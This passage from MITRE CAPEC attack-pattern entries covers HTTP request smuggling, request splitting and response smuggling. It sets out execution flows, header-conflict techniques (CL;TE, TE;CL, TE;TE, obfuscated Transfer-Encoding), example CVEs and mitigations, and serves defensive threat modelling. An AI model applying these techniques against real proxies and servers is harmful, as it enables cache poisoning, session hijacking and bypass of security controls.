CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	63	Cross-Site Scripting (XSS)
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	115	Authentication Bypass
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	141	Cache Poisoning
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	148	Content Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	154	Resource Location Spoofing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	593	Session Hijacking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.
Techniques
Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, message sizes, and HTTP headers.

Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP requests to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

Techniques
Continue the monitoring of HTTP traffic.
Utilize various combinations of HTTP Headers within a single HTTP Request such as: Content-Length & Transfer-Encoding (CL;TE), Transfer-Encoding & Content-Length (TE;CL), or double Transfer-Encoding (TE;TE), so that additional embedded requests or data in the body of the original request are unprocessed and treated as part of subsequent requests by the intended target HTTP agent. From these HTTP Header combinations the adversary observes any timing delays (usually in the form of HTTP 404 Error response) or any other unintended consequences. For CL;TE and TE;CL HTTP header combinations, the first HTTP agent, in the HTTP message path that receives the HTTP request, takes precedence or only processes one header but not the other, while the second/final HTTP agent processes the opposite header, allowing for embedded HTTP requests to be ignored and smuggled to the intended target HTTP agent. For TE;TE HTTP headers combination, all HTTP agents in HTTP message path process Transfer-Encoding header, however, adversary obfuscation (see Mitigations for details) of one of the Transfer-Encoding headers, by not adhering strictly to the protocol specification, can cause it to be unprocessed/ignored by a designated HTTP agent, hence allowing embedded HTTP requests to be smuggled. .
Construct a very large HTTP request using multiple Content-Length headers of various data lengths that can potentially cause subsequent requests to be ignored by an intermediary HTTP agent (firewall) and/or eventually parsed separately by the target HTTP agent (web server). Note that most modern HTTP infrastructure reject HTTP requests with multiple Content-Length headers.
Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

Perform HTTP Request Smuggling attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.
Techniques
Leverage techniques identified in the Experiment Phase.

Prerequisites

An additional intermediary HTTP agent such as an application firewall or a web caching proxy between the adversary and the second agent such as a web server, that sends multiple HTTP messages over same network connection.

Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.

HTTP agents running on HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses.

Skills Required

[Level: Medium]

Detailed knowledge on HTTP protocol: request and response messages structure and usage of specific headers.

[Level: Medium]

Detailed knowledge on how specific HTTP agents receive, send, process, interpret, and parse a variety of HTTP messages and headers.

[Level: Medium]

Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers.

Resources Required

Tools capable of crafting malicious HTTP messages and monitoring HTTP message responses.

Indicators

Differences in requests processed by the two agents. This requires careful monitoring or a capable log analysis tool.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges
Integrity	Modify Data

Mitigations

Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.

Configuration: front-end HTTP agents notice ambiguous requests.

Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.

Configuration: Disable reuse of back-end connections.

Configuration: Use HTTP/2 for back-end connections.

Configuration: Use the same web server software for front-end and back-end server.

Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.

Configuration: Prioritize Transfer-Encoding header over Content-Length, whenever an HTTP message contains both.

Configuration: Disallow HTTP messages with both Transfer-Encoding and Content-Length or Double Content-Length Headers.

Configuration: Disallow Malformed/Invalid Transfer-Encoding Headers used in obfuscation, such as:

Headers with no space before the value “chunked”
Headers with extra spaces
Headers beginning with trailing characters
Headers providing a value “chunk” instead of “chunked” (the server normalizes this as chunked encoding)
Headers with multiple spaces before the value “chunked”
Headers with quoted values (whether single or double quotations)
Headers with CRLF characters before the value “chunked”
Values with invalid characters

Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)

Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.

Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input.

Example Instances

When using Haproxy 1.5.3 version as front-end proxy server with with Node.js version 14.13.1 or 12.19.0 as the back-end web server it is possible to use two same header fields for example: two Transfer-Encoding, Transfer-Encoding: chunked and Transfer-Encoding: chunked-false, to bypass Haproxy /flag URI restriction and receive the Haproxy flag value, since Node.js identifies the first header but ignores the second header. See also: CVE-2020-8287

When using Sun Java System Web Proxy Server 3.x or 4.x in conjunction with Sun ONE/iPlanet 6.x, Sun Java System Application Server 7.x or 8.x, it is possible to bypass certain application firewall protections, hijack web sessions, perform Cross Site Scripting or poison the web proxy cache using HTTP Request Smuggling. Differences in the way HTTP requests are parsed by the Proxy Server and the Application Server enable malicious requests to be smuggled through to the Application Server, thereby exposing the Application Server to aforementioned attacks. See also: CVE-2006-6276

Apache server 2.0.45 and version before 1.3.34, when used as a proxy, easily lead to web cache poisoning and bypassing of application firewall restrictions because of non-standard HTTP behavior. Although the HTTP/1.1 specification clearly states that a request with both "Content-Length" and a "Transfer-Encoding: chunked" headers is invalid, vulnerable versions of Apache accept such requests and reassemble the ones with "Transfer-Encoding: chunked" header without replacing the existing "Content-Length" header or adding its own. This leads to HTTP Request Smuggling using a request with a chunked body and a header with "Content-Length: 0". See also: CVE-2005-2088

Related Weaknesses

CWE-ID	Weakness Name
444	Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')

Notes

Relationship

HTTP Smuggling is an evolution of previous HTTP Splitting techniques which are commonly remediated against.

Terminology

HTTP Splitting – "the act of forcing a sender of (HTTP) messages to emit data stream consisting of more messages than the sender’s intension. The messages sent are 100% valid and RFC compliant" [REF-117].

Terminology

HTTP Smuggling – "the act of forcing a sender of (HTTP) messages to emit data stream which may be parsed as a different set of messages (i.e. dislocated message boundaries) than the sender’s intention. This is done by virtue of forcing the sender to emit non-standard messages which can be interpreted in more than one way" [REF-117].

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
26	HTTP Request Smuggling

References

[REF-38] "HTTP 1.1 Specification (RFC 2616)". IETF RFC. <http://www.ietf.org/rfc/rfc2616.txt>.

[REF-117] "HTTP Response Smuggling". Beyond Security. <http://www.securiteam.com/securityreviews/5CP0L0AHPC.html>.

[REF-617] "OWASP Web Security Testing Guide". The Open Web Application Security Project (OWASP). <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html>.

[REF-672] Robert Auger. "HTTP Request Smuggling". The Web Application Security Consortium. 2010-01. <http://projects.webappsec.org/w/page/13246928/HTTP%20Request%20Smuggling>. URL validated: 2021-10-06.

[REF-673] Dzevad Alibegovic. "HTTP Request Smuggling: Complete Guide to Attack Types and Prevention". NeuraLegion. 2021-08-23. <https://www.neuralegion.com/blog/http-request-smuggling-hrs/>. URL validated: 2021-10-06.

[REF-674] Busra Demir. "A Pentester’s Guide to HTTP Request Smuggling". Cobalt. 2020-10-15. <https://cobalt.io/blog/a-pentesters-guide-to-http-request-smuggling>. URL validated: 2021-10-06.

[REF-678] Edi Kogan and Daniel Kerman. "HTTP Desync Attacks in the Wild and How to Defend Against Them". Imperva. 2019-10-29. <https://www.imperva.com/blog/http-desync-attacks-and-defence-methods/>. URL validated: 2021-10-06.

[REF-681] James Kettle. "HTTP Desync Attacks: Request Smuggling Reborn". PortSwigger. 2019-08-07. <https://portswigger.net/research/http-desync-attacks-request-smuggling-reborn>. URL validated: 2021-10-06.

[REF-682] "HTTP request smuggling". PortSwigger. <https://portswigger.net/web-security/request-smuggling>. URL validated: 2021-10-06.

[REF-683] "Finding HTTP request smuggling vulnerabilities". PortSwigger. <https://portswigger.net/web-security/request-smuggling/finding>. URL validated: 2021-10-06.

[REF-684] "Exploiting HTTP request smuggling vulnerabilities". PortSwigger. <https://portswigger.net/web-security/request-smuggling/exploiting>. URL validated: 2021-10-06.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Attack_Patterns, Resources_Required
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated References, Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated @Status, Alternate_Terms, Consequences, Description, Example_Instances, Execution_Flow, Extended_Description, Indicators, Mitigations, Notes, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Alternate_Terms, Description, Extended_Description

CAPEC-105: HTTP Request Splitting

Attack Pattern ID: 105

Abstraction: Detailed

View customized information:

Description

See CanPrecede relationships for possible consequences.

Extended Description

This entails the adversary injecting malicious user input into various standard and/or user defined HTTP headers within a HTTP Request through user input of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters and unique character encoding. This malicious user input allows for web script to be injected in HTTP headers as well as into browser cookies or Ajax web/browser object parameters like XMLHttpRequest during implementation of asynchronous requests.

This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.

This differs from CAPEC-34 HTTP Response Splitting, which is usually an attempt to compromise a client agent (e.g., web browser) by sending malicious content in HTTP responses from back-end HTTP infrastructure. HTTP Request Splitting is an attempt to compromise a back-end HTTP agent via HTTP Request messages.

HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	220	Client-Server Protocol Manipulation
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	34	HTTP Response Splitting
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	63	Cross-Site Scripting (XSS)
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	115	Authentication Bypass
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	141	Cache Poisoning
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	148	Content Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	154	Resource Location Spoofing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	593	Session Hijacking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.
Techniques
Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering.

Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP requests with custom strings and embedded web scripts and objects in HTTP headers to interfere with the parsing of intermediary and back-end HTTP infrastructure, followed by normal/benign HTTP request from the adversary or a random user. The intended consequences of the malicious HTTP requests will be observed in the HTTP infrastructure response to the normal/benign HTTP request to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

Techniques

Continue the monitoring of HTTP traffic.

Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:

additional HTTP Requests with their own headers
malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)
adversary chosen encoding (e.g., UTF-7)

to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.

Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant.

Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

Perform HTTP Request Splitting attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.
Techniques
Leverage techniques identified in the Experiment Phase.

Prerequisites

Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.

HTTP headers capable of being user-manipulated.

HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses.

Skills Required

[Level: Medium]

Detailed knowledge on HTTP protocol: request and response messages structure and usage of specific headers.

[Level: Medium]

Detailed knowledge on how specific HTTP agents receive, send, process, interpret, and parse a variety of HTTP messages and headers.

[Level: Medium]

Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers.

Resources Required

Tools capable of crafting malicious HTTP messages and monitoring HTTP messages responses.

Indicators

Differences in requests processed by the two agents. This requires careful monitoring or a capable log analysis tool.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality	Read Data
Integrity	Modify Data

Mitigations

Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.

Configuration: front-end HTTP agents notice ambiguous requests.

Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.

Configuration: Disable reuse of back-end connections.

Configuration: Use HTTP/2 for back-end connections.

Configuration: Use the same web server software for front-end and back-end server.

Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.

Configuration: Install latest vendor security patches available for both intermediary and back-end HTTP infrastructure (i.e. proxies and web servers)

Configuration: Ensure that HTTP infrastructure in the chain or network path utilize a strict uniform parsing process.

Implementation: Utilize intermediary HTTP infrastructure capable of filtering and/or sanitizing user-input.

Example Instances

Microsoft Internet Explorer versions 5.01 SP4 and prior, 6.0 SP2 and prior, and 7.0 contain a vulnerability that could allow an unauthenticated, remote adversary to conduct HTTP request splitting and smuggling attacks. The vulnerability is due to an input validation error in the browser that allows adversaries to manipulate certain headers to expose the browser to HTTP request splitting and smuggling attacks. Attacks may include cross-site scripting, proxy cache poisoning, and session fixation. In certain instances, an exploit could allow the adversary to bypass web application firewalls or other filtering devices. Microsoft has confirmed the vulnerability and released software updates.

Related Weaknesses

CWE-ID	Weakness Name
74	Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection')
113	Improper Neutralization of CRLF Sequences in HTTP Headers ('HTTP Request/Response Splitting')
138	Improper Neutralization of Special Elements
436	Interpretation Conflict

Notes

Relationship

HTTP Smuggling is an evolution of previous HTTP Splitting techniques which are commonly remediated against.

Terminology

Taxonomy Mappings

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
24	HTTP Request Splitting

References

[REF-117] "HTTP Response Smuggling". Beyond Security. <http://www.securiteam.com/securityreviews/5CP0L0AHPC.html>.

[REF-679] Robert Auger. "HTTP Request Splitting". The Web Application Security Consortium. 2011. <http://projects.webappsec.org/w/page/13246929/HTTP%20Request%20Splitting>. URL validated: 2021-10-14.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Related_Attack_Patterns, Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Weaknesses
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated @Abstraction, References, Taxonomy_Mappings
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated @Status, Consequences, Description, Example_Instances, Execution_Flow, Extended_Description, Indicators, Mitigations, Notes, Prerequisites, References, Related_Attack_Patterns, Related_Weaknesses, Resources_Required, Skills_Required
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Extended_Description, Related_Weaknesses

CAPEC-273: HTTP Response Smuggling

Attack Pattern ID: 273

Abstraction: Detailed

View customized information:

Description

See CanPrecede relationships for possible consequences.

Extended Description

In the maliciously manipulated HTTP response, an adversary can add duplicate header fields that HTTP agents interpret as belonging to separate responses.

The combined HTTP response ends up being parsed or interpreted as two or more HTTP responses by the targeted client HTTP agent. This allows malicious HTTP responses to bypass security controls. This is performed by the abuse of interpretation and parsing discrepancies in different intermediary HTTP agents (e.g., load balancer, reverse proxy, web caching proxies, application firewalls, etc.) or client HTTP agents (e.g., web browser) in the path of the malicious HTTP responses.

Additionally this attack can be performed through modification and/or fuzzing of parameters composing the request-line of HTTP messages.

This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions in the HTTP agents.

This differs from CAPEC-33 HTTP Request Smuggling, which is usually an attempt to compromise a back-end HTTP agent via HTTP Request messages. HTTP Response Smuggling is an attempt to compromise a client agent (e.g., web browser) .

Alternate Terms

Term: HTTP Desync

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	220	Client-Server Protocol Manipulation
PeerOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	33	HTTP Request Smuggling
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	63	Cross-Site Scripting (XSS)
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	115	Authentication Bypass
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	141	Cache Poisoning
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	148	Content Spoofing
CanPrecede	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	154	Resource Location Spoofing
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	593	Session Hijacking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets.
Techniques
Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure to intended targets in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, message sizes, and HTTP headers.

Cause differential HTTP responses by experimenting with identified HTTP Response vulnerabilities: The adversary sends maliciously crafted HTTP request to back-end HTTP infrastructure to inject adversary data into HTTP responses (intended for intermediary and/or front-end client/victim HTTP agents communicating with back-end HTTP infrastructure) for the purpose of interfering with the parsing of HTTP response. The intended consequences of the malicious HTTP request and the subsequent adversary injection and manipulation of HTTP responses will be observed to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

Techniques
Continue the monitoring of HTTP traffic.
Inject additional HTTP headers to utilize various combinations of HTTP Headers within a single HTTP message such as: Content-Length & Transfer-Encoding (CL;TE), Transfer-Encoding & Content-Length (TE;CL), or double Transfer-Encoding (TE;TE), so that additional embedded message or data in the body of the original message are unprocessed and treated as part of subsequent messages by the intended target HTTP agent. From these HTTP Header combinations the adversary observes any timing delays (usually in the form of HTTP 404 Error response) or any other unintended consequences. For CL;TE and TE;CL HTTP headers combination, the first HTTP agent, in the HTTP message path that receives the HTTP message, takes precedence or only processes the one header but not the other, while the second/final HTTP agent processes the opposite header allowing for embedded HTTP message to be ignored and smuggled to the intended target HTTP agent. For TE;TE HTTP headers combination, all HTTP agents in HTTP message path process Transfer-Encoding header, however, adversary obfuscation of one of the Transfer-Encoding headers, by not adhering strictly to the protocol specification, can cause it to be unprocessed/ignored by a designated HTTP agent, hence allowing embedded HTTP messages to be smuggled. See Mitigations for details.
Construct a very large HTTP message via multiple Content-Length headers of various data lengths that can potentially cause subsequent messages to be ignored by an intermediary HTTP agent (e.g., firewall) and/or eventually parsed separately by the target HTTP agent. Note that most modern HTTP infrastructure reject HTTP messages with multiple Content-Length headers.
Monitor HTTP traffic using a tool such as a Network Protocol Analyzer.

Exploit

Perform HTTP Response Smuggling attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.
Techniques
Leverage techniques identified in the Experiment Phase.

Prerequisites

A vulnerable or compromised server or domain/site capable of allowing adversary to insert/inject malicious content that will appear in the server's response to target HTTP agents (e.g., proxies and users' web browsers).

Differences in the way the two HTTP agents parse and interpret HTTP responses and its headers.

HTTP agents running on HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses.

Skills Required

[Level: Medium]

Detailed knowledge on HTTP protocol: request and response messages structure and usage of specific headers.

[Level: Medium]

Detailed knowledge on how specific HTTP agents receive, send, process, interpret, and parse a variety of HTTP messages and headers.

[Level: Medium]

Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers.

Resources Required

Tools capable of monitoring HTTP messages, and crafting malicious HTTP messages and/or injecting malicious content into HTTP messages.

Indicators

Differences in responses processed by the two agents. This requires careful monitoring or a capable log analysis tool.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges
Integrity	Modify Data

Mitigations

Design: evaluate HTTP agents prior to deployment for parsing/interpretation discrepancies.

Configuration: front-end HTTP agents notice ambiguous requests.

Configuration: back-end HTTP agents reject ambiguous requests and close the network connection.

Configuration: Disable reuse of back-end connections.

Configuration: Use HTTP/2 for back-end connections.

Configuration: Use the same web server software for front-end and back-end server.

Implementation: Utilize a Web Application Firewall (WAF) that has built-in mitigation to detect abnormal requests/responses.

Configuration: Prioritize Transfer-Encoding header over Content-Length, whenever an HTTP message contains both.

Configuration: Disallow HTTP messages with both Transfer-Encoding and Content-Length or Double Content-Length Headers.

Configuration: Disallow Malformed/Invalid Transfer-Encoding Headers used in obfuscation, such as:

Headers with no space before the value “chunked”
Headers with extra spaces
Headers beginning with trailing characters
Headers providing a value “chunk” instead of “chunked” (the server normalizes this as chunked encoding)
Headers with multiple spaces before the value “chunked”
Headers with quoted values (whether single or double quotations)
Headers with CRLF characters before the value “chunked”
Values with invalid characters

